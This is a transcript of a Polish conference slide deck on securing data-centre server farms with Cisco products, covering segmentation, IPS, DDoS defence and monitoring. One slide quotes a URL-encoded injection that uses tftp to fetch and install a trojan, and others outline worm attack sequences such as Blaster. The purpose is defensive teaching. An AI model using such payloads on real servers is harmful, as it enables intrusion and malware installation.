Bezpieczeństwo Centrum Przetwarzania Danych

Transkrypt

1 Bezpieczeństwo Centrum Przetwarzania Danych (czyli jak do problemu podejść praktycznie) Łukasz Bromirski Wrocław, 21 października

2 Agenda Problemy zagrożenia i wyzwania Jak wygląda CPD? Segmentacja farmy serwerów Opcje projektowe Mechanizmy IPS Bezpieczeństwo aplikacji Zapobieganie atakom DDoS Monitoring i analiza pracy CPD 2

3 Problemy wyzwania i zagrożenia 3

4 Typowa sekwencja ataku na CPD Włamanie na serwer przez aplikację Segment L2 Segment L3 HTTP Web Server Web Server Aplikacja/frontend Baza danych Po skanowaniu, włamywacz wykorzystuje konkretną lukę (lub zestaw luk) do ataku Zwykle dochodzi do otworzenia powłoki systemowej Na przykład (skopiowanie trojana na zaatakowany system): +tftp%20-i% %20get%20trojan.exe%20trojan.exe 4

5 Sekwencja włamania - Blaster Jednoczesne połączenie na TCP/135 w blokach po 20 IP Po dwóch sekundach wysłanie exploita DCOM do połączonych hostów Połączenie do portu 4444 Uruchomienie serwera TFTP Skopiowanie msblast.exe Port 4444 Wykonanie ataku Buffer Overflow i otworzenie kanału kontrolnego do powłoki na porcie 4444 Ściągnięcie msblast.exe Zamknięcie serwera TFTP Uruchomienie msblast.exe 4444 Zapisanie do rejestru Windows, Rozpoczęcie SYN Flood do windowsupdate.com od 16 sierpnia 5

6 Wzorce ataków, które znamy... Robak Port atakowany Port kontrolny Przesyłanie plików Zawartość Blaster TFTP-69 Syn-Flood MSFT Spida SMB-445 Sasser FTP-5554 Skan Korgo ,2041, TCP Backdoors IRC Connect HTTP Download Zotob FTP IRC Conn

7 Jak wygląda CPD? 7

8 Typowa topologia CPD Sieć firmy ISP A Internet ISP B Przełączniki brzegowe Przełączniki szkieletowe Przełączniki agregacyjne Przełączniki dostępowe Sekcja WWW Sekcja aplikacji Sekcja baz danych 8

9 Topologia dwóch połączonych CPD Active/active lub active/standby Sieć firmowa ISP A Internet ISP B Sieć firmowa Active/Active Hosting WWW Active/Active Aplikacje Active/Standby Bazy danych 9

10 Cisco Business Ready Data Center Kompletne rozwiązanie bezpieczeństwa SSL, IPSEC szyfrowanie 3DES/AES, identyfikacja klientów IP Layer 3 links Layer 2 links Test RPF filtrowanie zgodnie z RFC1858 filtrowanie RFC2827 Layer 3 links TCP HTTP, DNS, SMTP ARP, Ethernet VLAN web SYN cookies TCP intercept Virtual fragment reassembly Uwierzytelnianie Ograniczenie ilości połączeń do serwerów (łącznie i na sekundę) fixups, ISN randomization VLAN web, app VLAN web VLAN web, app VLAN web, app VLAN app VLAN app VLAN web VLAN app VLAN web VLAN web, app sygnatury dla serwerów pozwalają zidentyfikować próby nadużyć VLAN app PVLANy ochrona przed MAC floodingiem ochrona przed ARP-spoofingiem 10

11 Segmentacja w farmie serwerów 11

12 Po co segmentować serwery? Ograniczenie osiągalności Zapobiega komunikacji po dowolnych portach 1434 Web Zatrzymanie możliwości pobrania robaków lub wysłania własnych informacji w niekontrolowany sposób Ogranicza propagacje Worm Exploit Port Control Port File Transfer Payload DB Blaster Spida TFTP-69 SMB-445 Syn-Flood Info Raportowanie zdarzeń i włamań Sasser Korgo Zotob ,2041, FTP FTP-3333 Scan Steal IRC 12

13 Budowa zestawu reguł ruchowych NAM per Host CSA per Proces MARS/FWSM per VLAN 13

14 Projektowanie segmentacji w farmie serwerów 14

15 Od separacji fizycznej do logicznej Monitoring, bezpieczeństwo, usługi wysokiej dostępności Serwery WWW Serwery aplikacji Serwery baz danych 15

16 Platforma sieciowa dla CPD Catalyst , 4, 6, 9 lub 13 slotów po 40Gbit/s per slot, do 48Mp/s per slot w modelu rozproszonego przetwarzania do 32 tysięcy ACL obsługiwanych sprzętowo obsługa mechanizmów bezpieczeństwa L2/L3 mechanizmy CoPP duża ilość kart serwisowych w pełni modularny software 16

17 Catalyst 6500 Portfolio kart serwisowych Moduł FWSM Moduł VPN SPA w SCC Moduł IDS/IPS Moduł WebVPN Moduł CSM/SSL SIP 200/400/600 WSLM/WiSM PSD/CSG/MWAM Moduł komunikacji Moduł AON/ACE Moduły Guard/TAD Moduł NAM 2006 Cisco Systems, Inc. All rights reserved. Cisco Public 17

18 A. Model typowy 5 Gbps Szkielet Agregacja bpdu forwarding Dostęp RHI Aktywna VIPx L3 Sync Zapasowa Konfiguracja z drogą zapasową Połączenia L3 P2P do szkieletu SLB routowany na jednym interfejsie Server-to-server CSM offload PBR/sNAT dla ruchu wracającego CSM routuje ruch RHI wykorzystany do ściągnięcia ruchu Bezpieczeństwo Firewalle pracujące w L2 Wiele kontekstów (wirtualnych instancji) Pętla z aktywnym PVST+ Podwójne uplinki Połowa zasobów nieaktywna 18

19 B. Model active-active Aktywny Aktywny Używa kart ACE i FWSM Gbps RHI L3 Load-balancing na poziomie VIP, VLAN Model active-active: Połączenia dostępowe Dostępne usługi hsrp Primary Blue STP Root Blue RHI hsrp Primary Red STP Root Red Podwaja łączną wydajność poszczególnych elementów Wymaga dostępu z pętlą w warstwie dostępowej 19

20 C. Zintegrowanie usług firewall i SLB Aktywny Aktywny Funkcje firewall i SLB zapewnia ACE L3 Uproszczony projekt i działanie Gbit/s VIPx VIPy Wydajność na poziomie 16/32Gbit/s Bez pętli w dostępie Sync Możliwości karty ACE vs FWSM Śledzenie: zarówno HSRP jak i ACE śledzą dostep do aktywnych VLANów Nie wszystkie rozszerzenia i usługi zaawansowane są obsługiwane 20

21 D. Kanapka wykorzystująca VRF 10 Gbps global MSFC L3 W pełni funkcjonalny zestaw logicznych instancji Wydajność serwer-serwer Pomija karty FWSM i ACE w przypadku ruchu w tym samym zestawie VRFów Elastyczna topologia dostępowa L2 z pętlą 100+ Gbps VRF svr-to-svr offload L2 L3 Dostęp L2 lub L3 współdzielony VRF ip vrf BLUE rd 10:10 import 40:40 export 10:10 ip vrf GREEN rd 20:20 import 40:40 export 20:20 ip vrf SHARED rd 40:40 import 10:10 import 20:20 export 40:40 L2 bez pętli L3 21

22 Wykrywanie włamań i korelacja zdarzeń 22

23 Wykrywanie robaków Przykładowy wzorzec evidsalert: eventid= vendor=cisco severity=medium originator: hostid: ips1 time: September 20, :04:28 PM UTC offset=0 timezone=utc signature: description= Nachi Worm ICMP Echo Request id=2158 version=s167 sigdetails: Nachi ICMP interfacegroup: vlan: 0 participants: attacker: addr: locality=out target: addr: locality=out actions: iploggingactivated: true logpairpacketsactivated: true iplogids: iplogid: triggerpacket: B E8 0E D0 04 AE 94 0A {...E C B1 DC FC E7 AC 1E 66 9E AC 1C.\...w...f D B0 0D F0 9C AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA... riskratingvalue: 60 interface: ge0_0 protocol: icmp 2004 ICMP echo request: MS ping triggerpacket: F E C 29 DE B2 0B _.d...)...E C F2 0C A 0C 14.<"0...P A 6E A A n...Y...ABCDEF A 4B 4C 4D 4E 4F GHIJKLMNOPQRSTUV WABCDEFGHI 23

24 Wykrywanie robaków Skan sieci evidsalert: eventid= vendor=cisco severity=low hostid: ips1 time: September 20, :04:28 PM UTC offset=0 timezone=utc signature: description= ICMP Network Sweep w/echo id=2100 version=s2 subsigid: 0 interfacegroup: vlan: 0 participants: attacker: addr: locality=out target: addr: locality=out target: addr: locality=out target: addr: locality=out target: addr: locality=out target: addr: locality=out target: addr: locality=out actions: droppedpacket: true deniedattacker: true riskratingvalue: 50 interface: ge0_0 protocol: icmp Mechanizmy heurystyczne pozwalają wykryć wiele rodzajów skanowania 24

25 Problem z systemami IDS/IPS Logi, wszędzie są logi! 25

26 Wizualizacja zdarzeń Cisco MARS Brązowy Czerwony Purpurowy = Atakujący = Zarażony = Zarażony i atakujący 26

27 Agregacja zdarzeń i incydentów 27

28 Robak złapany dzięki systemowi MARS 28

29 Możliwości raportowania systemu MARS Szukanie hostów które zaatakowano Możliwość szczegółowego zebrania informacji o konkretnych hoście 46,000 sesji 22 hostów zarażonych w ciągu ostatnich 30 dni... 29

30 Zapobieganie włamaniom 30

31 Blokowanie na drodze pakietu - inline IPS 31

32 Wyznaczenie indeksu RR Dokładność Stopień zagrożenia samego zdarzenia (info), 50 (low), 75 (med), 100 (high) Poziom wartości konkretnego celu (low), 100 (med), 150 (high), 200 (critical) 32

33 Przypisywanie akcji na podstawie RR 33

34 Bezpieczeństwo aplikacji 34

35 Ataki odbywają się w warstwie aplikacji... Ponad 75% ataków odbywa się tutaj Aplikacje WWW Dostosowane lub stworzone na zamówienie Kod wewnętrzny i firmowy Logika i kod biznesowy Nie ma sygnatur czy łat Sieciowy firewall IDS IPS Serwery WWW System operacyjny Serwery aplikacji System operacyjny Sieć Serwery baz danych System operacyjny 35

36 Zabezpieczenie serwerów Cisco Security Agent Zintegrowany system klasy HIPS Opcje dla stacji i serwerów Windows/Linux/Solaris Pozwala na dokładną korelację od procesu tworzącego ruch sieciowy, po poszczególne elementy sieci 36

37 Appliance AVS możliwości Ochrona cookies Szyfrowane Uwierzytelnione Max age Ochrona (maskowanie) pól pozwalających na kradzież tożsamości Generowanie reguł bezpieczeństwa z istniejących logów Ochrona na podstawie zgodności z protokołem HTTP Lista wspieranych metod Kontrola typów MIME (audio/mpeg/image/jpeg, etc.) Ochrona (maskowanie) specyfiki serwerów WWW Generowanie stron błędów, lub czyszczenie stron błędów aplikacyjnych Normalizacja URLi i standardu zapisu znaków, przekierowań Nakładanie limitów na zapytania ilościowych i objętościowych Zapobieganie atakom SQL injection Command injection Cross site scripting Format string attack Meta char detection LDAP injection Buffer overflow 37

38 AVS 3100 Opcje umieszczenia w topologii Span Port Model monitoringu OOB Łatwe do wdrożenia Zachowana widoczność ataków Monitoring per-aplikacja/vlan Tryb pracy inline Wdrożenie transparentne dla sieci, Blokowanie, logowanie, przepisywanie, przekierowanie, generowanie stron błędów, tagowanie URLi, nakładanie polityk z dokładnością do usług Model bramy Akceleracja WWW, redukcja opóźnień i optymalizacja transmisji TCP, loadbalancing w ramach klastra, terminowanie SSL, wszystkie mechanizmy dostępne w trybie inline 38

39 Ochrona farm serwerów przed atakami (D)DoS 39

40 Cele ataku (D)DoS Cel to oczywiście uniemożliwienie świadczenia usług Można to osiągnąć przez atak na: serwer urządzenie sieciowe po drodze połączenie CPD Może zostać połączone z fałszowaniem adresów źródłowych Przy okazji dostaje się również......routerom, innym systemom na drodze ataku całej infrastrukturze Tablice stanów Pasmo 40

41 Mechanizmy ochrony przez SYN flood SYN-Cookies Problem powodzi SYN Jeśli TCP SYN wymaga allokacji pamięci po stronie serwera, jest to atak DoS serwera Stos sieciowy TCP przetrzyma pakiet SYN w stanie SYN_RCVD do wygaśnięcia Nie trzeba fałszować żadnych danych z nagłówka w tym adresu źródłowego IP Dzięki wykorzystaniu SYN-cookies, serwer ani urządzenia sieciowe nie muszą allokować pamięci zwiększając odporność na atak DoS SYN ACK Cookie + 1 SYN ACK Cookie tworzone jako hash z pakietu SYN Odszyfrowanie i sprawdzenie cookie Nawiązanie połączenia TCP 41

42 DoS z punktu widzenia MARS Korelacja zdarzeń: Wewnętrzne mechanizmy MARS Informacje z systemów IPS Trafienia w reguły odrzucające pakiety w ACL systemów firewall Netflow 42

43 Anti-Spoofing Test urpf Mechanizm urpf wykorzystuje tablicę routingu do sprawdzenia adresu źródłowego Idealnie dostosowana do sieci budowanych w oparciu o L3 (routowanych) Źródłowy IP Połączenia do szkieletu Outside Inside IP Verify Unicast Source Reachable-via Rx Allow-Default 43

44 Moduły Cisco Guard/Anomaly Detector Ochrona przed atakami DoS/DDoS dla DC Internet O /24 [110/2] via , 2d11h, GigabitEthernet2 S /32 [20/0] via , 00:00: = zone = Guard Ruch do strefy 3. Przekierowanie do Guarda 4. Filtrowanie Ruch prawidłowy 6. Ruch do innych stref nie jest modyfikowany Remote Host Injection (RHI) Podejrzany ruch Moduł Guard Moduł wykrywania anomalii 2. Aktywacja (Auto/Ręczna) 1. Wykrycie anomalii Zone 1: WWW Atakowana strefa 5. Wstrzelenie ruchu z powrotem Zone 2: Serwery DNS Zone 3: Aplikacje e-commerce 44

45 Monitoring sieci 45

46 Rozwiązywanie problemów Analiza ruchu przed i po przejściu przez CPD Przeglądarka wysyła osiem zapytań docierają tylko cztery... 46

47 Ocena zapotrzebowania na pasmo Istotne dla planowania urządzeń inline 47

48 Gdzie szukać więcej informacji? Cisco BRDC Rozwiązania bezpieczeństwa Cisco 48

49 Q&A 49

50 50